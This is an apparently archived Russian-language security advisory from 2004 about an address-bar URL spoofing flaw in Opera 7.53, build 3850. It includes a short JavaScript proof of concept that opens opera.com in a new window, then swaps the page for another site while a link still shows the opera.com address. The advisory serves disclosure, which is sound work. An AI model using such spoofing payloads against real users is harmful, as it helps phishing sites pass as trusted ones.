Подмена URL в Web браузере Opera

Дата публикации:
28.07.2004
Всего просмотров:
3034
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Opera Web Browser 7.53, Build 3850

Описание: Уязвимость в Web браузере Opera в обработке javascript позволяет удаленному пользователю создать HTML, который подделает URL в адресной строке.

Удаленный пользователь может создать HTML, содержащий javascript, который, когда будет загружен, отобразить другой URL в адресной строке.

Пример/Эксплоит:

[script]
function fake() {
oc=window.open('http://www.opera.com/', '','location=1');
oc.location.replace('http://www.example.com');
}
[/script]
[a href="javascript:void(0);"
onClick="fake()"]http://www.opera.com/[/a]

URL производителя:http://www.opera.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Opera 7.53 (Build 3850) Address Bar Spoofing Issue

или введите имя

CAPTCHA